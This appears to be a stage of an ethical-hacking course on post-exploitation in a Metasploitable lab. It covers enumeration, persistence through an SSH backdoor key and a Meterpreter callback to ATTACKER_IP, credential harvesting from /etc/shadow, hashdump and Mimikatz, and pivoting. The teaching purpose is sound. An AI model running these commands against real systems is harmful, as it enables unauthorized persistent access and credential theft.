Courses Ethical Hacking I Stage 09

Stage 09 — Post-Exploitation Concepts

Maintaining Access and Demonstrating Impact

Certified Ethical Hacking I Learning Path Audience: Learners who have completed Stages 00-08

Prerequisites

  • [ ] Completed exploitation fundamentals (Stage 08)
  • [ ] Understand Metasploit and Meterpreter
  • [ ] Successfully exploited Metasploitable

What You Will Learn

  • Post-exploitation objectives
  • Situational awareness techniques
  • Maintaining access concepts
  • Credential harvesting
  • Lateral movement concepts
  • Pivoting through networks
  • Evidence collection for reporting

Part 1 — Post-Exploitation Objectives (Milestone 1)

What Happens After Initial Access?

┌─────────────────────────────────────────────────────────────────┐
│               Post-Exploitation Objectives                       │
├─────────────────────────────────────────────────────────────────┤
│  1. SITUATIONAL AWARENESS - Who am I? Where am I?              │
│  2. PRIVILEGE ESCALATION - Can I become root/admin?            │
│  3. PERSISTENCE - Can I maintain access?                        │
│  4. CREDENTIAL HARVESTING - What credentials exist?            │
│  5. LATERAL MOVEMENT - Can I reach other systems?              │
│  6. DATA DISCOVERY - What valuable data exists?                │
│  7. IMPACT DEMONSTRATION - What could an attacker do?          │
└─────────────────────────────────────────────────────────────────┘

Part 2 — Situational Awareness (Milestone 2)

Linux Enumeration

whoami && id                    # Current user
hostname && uname -a            # System info
cat /etc/passwd                 # Users
ip addr && netstat -tulpn       # Network
ps aux                          # Processes
find / -perm -4000 2>/dev/null  # SUID binaries

Windows Enumeration

whoami /priv                    # Privileges
systeminfo                      # System info
net user                        # Users
ipconfig /all && netstat -ano   # Network
tasklist                        # Processes

Meterpreter Commands

sysinfo                         # System info
getuid                          # Current user
ipconfig                        # Network
run post/multi/gather/env       # Environment

Part 3 — Maintaining Access (Milestone 3)

Persistence Concepts

| Platform | Methods |
|----------|---------|
| Linux | SSH keys, cron jobs, bashrc, systemd |
| Windows | Registry Run keys, scheduled tasks, services |
| Web | Web shells, modified files |

SSH Key Persistence

# On attacker: ssh-keygen -t rsa -f backdoor

On target:

mkdir -p ~/.ssh
echo "PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Meterpreter Persistence

run persistence -U -i 30 -p 4444 -r ATTACKER_IP

Part 4 — Credential Harvesting (Milestone 4)

Linux Credentials

cat /etc/shadow                                    # Password hashes
cat ~/.bash_history                                # Command history
grep -r "password" /etc/ 2>/dev/null              # Config files
grep -r "password" /var/www/ 2>/dev/null          # Web apps
find / -name "id_rsa" 2>/dev/null                 # SSH keys

Windows Credentials

# Meterpreter
hashdump                        # SAM hashes
load kiwi                       # Mimikatz
creds_all                       # All credentials

Common Credential Locations

  • Configuration files
  • Database connection strings
  • Environment variables
  • Browser stored passwords
  • SSH keys

Part 5 — Lateral Movement (Milestone 5)

Movement Techniques

┌─────────────────────────────────────────────────────────────────┐
│  CREDENTIAL-BASED: SSH, Pass-the-Hash, RDP                     │
│  EXPLOITATION: Internal vulnerabilities                         │
│  ACCESS-BASED: Shared folders, database links                  │
└─────────────────────────────────────────────────────────────────┘

SSH Movement

ssh user@internal_host
ssh -i found_key user@internal_host

Part 6 — Pivoting (Milestone 6)

Pivoting Concept

Use compromised host to access unreachable networks.

SSH Tunneling

# Local forward
ssh -L 3306:internal:3306 user@pivot

Dynamic SOCKS proxy

ssh -D 9050 user@pivot

Remote forward

ssh -R 8080:localhost:80 user@pivot

Meterpreter Pivoting

route add 10.0.0.0 255.255.255.0 SESSION_ID
run autoroute -s 10.0.0.0/24

use auxiliary/server/socks_proxy
set SRVPORT 9050
run

Part 7 — Evidence Collection (Milestone 7)

What to Document

  • Access proof (screenshots, command output)
  • Credentials obtained (redacted)
  • Systems accessed
  • Sensitive data found
  • Potential business impact

Evidence Organization

mkdir -p ~/security-lab/evidence/post_exploit/{screenshots,logs,credentials}

Session logging

script -a session_log.txt

Take screenshots in Meterpreter

screenshot

Part 8 — Cleanup (Milestone 8)

Professional Standards

As a penetration tester:
  • Document all actions
  • Remove only YOUR artifacts
  • Do NOT clear logs
  • Report all access
  • Restore any changes made

Stage 09 Assessment

Written Questions

  1. What are the main post-exploitation objectives?
  2. Explain the difference between persistence and lateral movement.
  3. Where do credentials commonly hide on Linux?
  4. What is pivoting and when is it needed?
  5. What evidence should you collect during post-exploitation?

Practical Assessment

  1. Exploit Metasploitable and perform full enumeration
  2. Search for and document credentials found
  3. Demonstrate potential impact
  4. Create evidence documentation

Completion Checklist

  • [ ] Understand post-exploitation workflow
  • [ ] Can enumerate compromised systems
  • [ ] Understand persistence concepts
  • [ ] Can search for credentials
  • [ ] Understand lateral movement
  • [ ] Understand pivoting concepts
  • [ ] Can collect and organize evidence
Next: Stage 10 — Professional Practice 
git add . && git commit -m "Complete Stage 09 - Post-Exploitation Concepts"
← Previous Stage 10 of 17 Next →